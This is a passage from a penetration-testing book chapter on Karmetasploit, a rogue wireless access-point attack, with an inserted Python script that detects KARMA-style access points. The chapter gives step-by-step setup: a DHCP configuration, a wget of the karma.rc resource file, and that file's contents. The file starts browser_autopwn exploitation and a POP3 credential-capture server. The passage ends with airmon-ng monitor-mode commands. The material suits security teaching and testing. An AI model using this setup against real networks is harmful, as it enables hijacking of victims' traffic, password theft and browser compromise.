Chapter 12. Karmetasploit

Karmetasploit is Metasploit’s implementation of KARMA, a set of wireless security tools developed by Dino Dai Zovi and Shane Macaulay. KARMA takes advantage of a vulnerability inherent in the way Windows XP and Mac OS X operating systems search for networks: When each system boots, it sends beacons looking for networks to which it has connected previously.

An attacker using KARMA sets up a fake access point on his computer and then listens for and responds to these beacons from the target, pretending to be whatever wireless network the client is looking for. Because most client computers are configured to connect automatically to wireless networks they have already used, KARMA can be used to gain complete control of a client’s network traffic, thus allowing an attacker to launch client-side attacks, capture passwords, and so forth. With the prevalence of poorly secured corporate wireless networks, an attacker using KARMA can sit in a nearby parking lot, adjacent office, or similar, and gain access to a target’s network with little effort. You can read more about the original implementation of KARMA at http://trailofbits.com/karma/.
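The behaviour just described, a single access point answering for whatever network each client asks about, is also what a defender can look for on the air. The following Python script is an added example that is not part of the chapter: it takes a constructed log of observed probe responses (the `<bssid> <client-mac> <ssid>` line format is an assumption, not any real tool's output) and flags any BSSID that has claimed several distinct SSIDs.

```python
import re
from collections import defaultdict

# Constructed sample (not from the chapter): one probe-response observation per
# line, as a wireless monitor might log it: "<bssid> <client-mac> <ssid>".
# The first BSSID answers four unrelated names; the second answers only one.
SAMPLE_LOG = """\
aa:bb:cc:00:00:01 11:22:33:44:55:01 CorpWiFi
aa:bb:cc:00:00:01 11:22:33:44:55:02 CoffeeShop
aa:bb:cc:00:00:01 11:22:33:44:55:03 HomeNet-5G
aa:bb:cc:00:00:01 11:22:33:44:55:04 Airport Free WiFi
de:ad:be:ef:00:02 11:22:33:44:55:05 CorpWiFi
de:ad:be:ef:00:02 11:22:33:44:55:06 CorpWiFi
this line is malformed and is skipped
"""

MAC = r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}"
LINE_RE = re.compile(rf"^(?P<bssid>{MAC})\s+(?P<client>{MAC})\s+(?P<ssid>\S.*)$", re.I)


def parse_probe_responses(text):
    """Yield (bssid, client, ssid) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["bssid"].lower(), m["client"].lower(), m["ssid"].strip()


def find_karma_candidates(text, threshold=3):
    """Return {bssid: sorted SSIDs} for every BSSID that answered probes for at
    least `threshold` distinct network names.

    A normal access point answers only for the SSID(s) it actually serves; a
    KARMA-style AP says "yes" to whatever name each client asks for, so one
    BSSID claiming many unrelated SSIDs is the signature to alert on."""
    ssids_by_bssid = defaultdict(set)
    for bssid, _client, ssid in parse_probe_responses(text):
        ssids_by_bssid[bssid].add(ssid)
    return {b: sorted(s) for b, s in ssids_by_bssid.items() if len(s) >= threshold}


if __name__ == "__main__":
    for bssid, ssids in find_karma_candidates(SAMPLE_LOG).items():
        print(f"possible KARMA AP {bssid}: answered for {len(ssids)} SSIDs: {ssids}")
```

A legitimate enterprise AP that broadcasts several SSIDs will trip the same check, so treat the threshold as a tuning knob and compare hits against a list of known-good BSSIDs.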

Karmetasploit is the Metasploit Framework implementation of the KARMA attack. It implements various “evil” services including DNS, POP3, IMAP4, SMTP, FTP, SMB, and HTTP. These services accept and respond to most requests from clients and will serve up all kinds of malicious fun. (The various modules are in the modules/auxiliary/server directory of the Metasploit root directory.)

Karmetasploit requires very little configuration. To begin, we configure a DHCP server to be used to hand out IP addresses to wireless targets. Back|Track includes a DHCP server, but we will need to create a custom configuration file for it to use with Karmetasploit, as shown in the following listing:

  option domain-name-servers 10.0.0.1;
  default-lease-time 60;
  max-lease-time 72;
  ddns-update-style none;
  authoritative;
  log-facility local7;
  subnet 10.0.0.0 netmask 255.255.255.0 {
      range 10.0.0.100 10.0.0.254;
      option routers 10.0.0.1;
      option domain-name-servers 10.0.0.1;
  }

We back up our original dhcpd.conf file by entering cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.back, and then we create a new file containing the data shown in the listing above, which will serve addresses in the range 10.0.0.100 to 10.0.0.254. (If you are unfamiliar with DHCP configurations, don’t worry; as long as your new dhcpd.conf looks similar to this it should work fine.)

Next, we download the KARMA resource file, because as of this writing it’s not included in the regular Metasploit trunk:

root@bt:/opt/metasploit3/msf3# wget http://www.offensive-security.com/downloads/karma.rc

When we open the KARMA resource file karma.rc, we can see the sequence of events that occur when it runs, as shown here:

root@bt:/opt/metasploit3/msf3# cat karma.rc
  db_connect postgres:toor@127.0.0.1/msfbook
  use auxiliary/server/browser_autopwn
  setg AUTOPWN_HOST 10.0.0.1
  setg AUTOPWN_PORT 55550
  setg AUTOPWN_URI /ads
  set LHOST 10.0.0.1
  set LPORT 45000
  set SRVPORT 55550
  set URIPATH /ads
  run
  use auxiliary/server/capture/pop3
  set SRVPORT 110
  set SSL false
  run

After connecting to the database (db_connect postgres:toor@127.0.0.1/msfbook) in which to store its results, KARMA loads the browser_autopwn server, as shown in the resource file above. This is a handy way to attempt a number of exploits against a browser in an untargeted manner. A handful of the browser-based exploits in the Framework contain the directive include Msf::Exploit::Remote::BrowserAutopwn; exploits that contain that include line will be attempted when the autopwn server is accessed.

The AUTOPWN_HOST and LHOST settings set the local IP address to 10.0.0.1, which coincides with the DHCP configuration created earlier. The lines that follow configure and start the various servers. (To get a complete picture of what occurs in this attack, read the resource file.)

Next, we place our wireless card in monitor mode. The way in which we do this depends on our wireless card’s chipset. The wireless card in the following example uses the RT73 chipset. We use airmon-ng start wlan0 to place it in monitor mode:

root@bt:/opt/metasploit3/msf3# airmon-ng start wlan0